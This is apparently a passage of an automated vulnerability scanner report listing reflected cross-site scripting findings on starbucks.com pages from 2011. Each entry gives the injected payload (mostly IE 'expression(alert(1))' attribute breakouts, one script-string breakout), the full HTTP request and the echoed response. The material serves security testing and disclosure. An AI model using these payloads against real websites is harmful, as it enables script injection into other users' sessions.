1.888. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 367b2"style%3d"x%3aexpression(alert(1))"e74a53c9b86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 367b2"style="x:expression(alert(1))"e74a53c9b86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich?367b2"style%3d"x%3aexpression(alert(1))"e74a53c9b86=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:04:00 GMT Connection: close Content-Length: 43358
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich?367b2"style="x:expression(alert(1))"e74a53c9b86=1"/> ...[SNIP]...
1.889. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdb42"style%3d"x%3aexpression(alert(1))"28976a77c79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fdb42"style="x:expression(alert(1))"28976a77c79 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich?fdb42"style%3d"x%3aexpression(alert(1))"28976a77c79=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:04:26 GMT Connection: close Content-Length: 42483
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich?fdb42"style="x:expression(alert(1))"28976a77c79=1"/> ...[SNIP]...
1.890. http://www.starbucks.com/menu/food/yogurt/dark-cherry-yogurt-parfait [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/yogurt/dark-cherry-yogurt-parfait
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5726"style%3d"x%3aexpression(alert(1))"71244ff225 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5726"style="x:expression(alert(1))"71244ff225 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/yogurt/dark-cherry-yogurt-parfait?e5726"style%3d"x%3aexpression(alert(1))"71244ff225=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:05:50 GMT Connection: close Content-Length: 41443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/yogurt/dark-cherry-yogurt-parfait?e5726"style="x:expression(alert(1))"71244ff225=1"/> ...[SNIP]...
1.891. http://www.starbucks.com/menu/food/yogurt/greek-yogurt-honey-parfait [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/yogurt/greek-yogurt-honey-parfait
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54f34"style%3d"x%3aexpression(alert(1))"898a6039ac9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54f34"style="x:expression(alert(1))"898a6039ac9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/yogurt/greek-yogurt-honey-parfait?54f34"style%3d"x%3aexpression(alert(1))"898a6039ac9=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:07:03 GMT Connection: close Content-Length: 41314
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/yogurt/greek-yogurt-honey-parfait?54f34"style="x:expression(alert(1))"898a6039ac9=1"/> ...[SNIP]...
1.892. http://www.starbucks.com/menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74433"style%3d"x%3aexpression(alert(1))"de32106119b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 74433"style="x:expression(alert(1))"de32106119b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait?74433"style%3d"x%3aexpression(alert(1))"de32106119b=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:07:15 GMT Connection: close Content-Length: 41501
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait?74433"style="x:expression(alert(1))"de32106119b=1"/> ...[SNIP]...
1.893. http://www.starbucks.com/menu/nutrition [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/nutrition
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 604b3"style%3d"x%3aexpression(alert(1))"1631ed89de3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 604b3"style="x:expression(alert(1))"1631ed89de3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/nutrition?604b3"style%3d"x%3aexpression(alert(1))"1631ed89de3=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:07:13 GMT Connection: close Content-Length: 49499
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/nutrition?604b3"style="x:expression(alert(1))"1631ed89de3=1"/> ...[SNIP]...
1.894. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/nutrition/20-under-200
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 460c8"style%3d"x%3aexpression(alert(1))"93db86d9ebc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 460c8"style="x:expression(alert(1))"93db86d9ebc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/nutrition/20-under-200?460c8"style%3d"x%3aexpression(alert(1))"93db86d9ebc=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:07:55 GMT Connection: close Content-Length: 38413
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/nutrition/20-under-200?460c8"style="x:expression(alert(1))"93db86d9ebc=1"/> ...[SNIP]...
1.895. http://www.starbucks.com/menu/nutrition/35-under-350 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/nutrition/35-under-350
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d273"style%3d"x%3aexpression(alert(1))"805418c9f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d273"style="x:expression(alert(1))"805418c9f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/nutrition/35-under-350?4d273"style%3d"x%3aexpression(alert(1))"805418c9f1=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:08:42 GMT Connection: close Content-Length: 40944
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/nutrition/35-under-350?4d273"style="x:expression(alert(1))"805418c9f1=1"/> ...[SNIP]...
1.896. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d09aa"style%3d"x%3aexpression(alert(1))"81477c5bd4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d09aa"style="x:expression(alert(1))"81477c5bd4b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility?d09aa"style%3d"x%3aexpression(alert(1))"81477c5bd4b=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:13:26 GMT Connection: close Content-Length: 60882
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility?d09aa"style="x:expression(alert(1))"81477c5bd4b=1" /> ...[SNIP]...
1.897. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82ef5"%3balert(1)//49dd8543659 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 82ef5";alert(1)//49dd8543659 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /responsibility?82ef5"%3balert(1)//49dd8543659=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:13:28 GMT Connection: close Content-Length: 60787
1.898. http://www.starbucks.com/responsibility/community [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/community
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 372ca"style%3d"x%3aexpression(alert(1))"73e95ed1bd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 372ca"style="x:expression(alert(1))"73e95ed1bd6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/community?372ca"style%3d"x%3aexpression(alert(1))"73e95ed1bd6=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:13:40 GMT Connection: close Content-Length: 40476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/community?372ca"style="x:expression(alert(1))"73e95ed1bd6=1"/> ...[SNIP]...
1.899. http://www.starbucks.com/responsibility/community/community-service [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/community/community-service
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 656dc"style%3d"x%3aexpression(alert(1))"0bb7acaed5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 656dc"style="x:expression(alert(1))"0bb7acaed5f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/community/community-service?656dc"style%3d"x%3aexpression(alert(1))"0bb7acaed5f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:14:03 GMT Connection: close Content-Length: 37533
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/community/community-service?656dc"style="x:expression(alert(1))"0bb7acaed5f=1"/> ...[SNIP]...
1.900. http://www.starbucks.com/responsibility/community/ethos-water-fund [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/community/ethos-water-fund
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81e52"style%3d"x%3aexpression(alert(1))"55e877cb972 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81e52"style="x:expression(alert(1))"55e877cb972 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/community/ethos-water-fund?81e52"style%3d"x%3aexpression(alert(1))"55e877cb972=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:14:36 GMT Connection: close Content-Length: 36863
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/community/ethos-water-fund?81e52"style="x:expression(alert(1))"55e877cb972=1"/> ...[SNIP]...
1.901. http://www.starbucks.com/responsibility/community/starbucks-foundation [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/community/starbucks-foundation
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 711af"style%3d"x%3aexpression(alert(1))"aa02c4b265c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 711af"style="x:expression(alert(1))"aa02c4b265c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/community/starbucks-foundation?711af"style%3d"x%3aexpression(alert(1))"aa02c4b265c=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:14:29 GMT Connection: close Content-Length: 39409
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/community/starbucks-foundation?711af"style="x:expression(alert(1))"aa02c4b265c=1"/> ...[SNIP]...
1.902. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/community/starbucks-red
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7705d"style%3d"x%3aexpression(alert(1))"c7aa8f5b401 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7705d"style="x:expression(alert(1))"c7aa8f5b401 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /responsibility/community/starbucks-red?7705d"style%3d"x%3aexpression(alert(1))"c7aa8f5b401=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:14:17 GMT Connection: close Content-Length: 41929
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/community/starbucks-red?7705d"style="x:expression(alert(1))"c7aa8f5b401=1"/> ...[SNIP]...
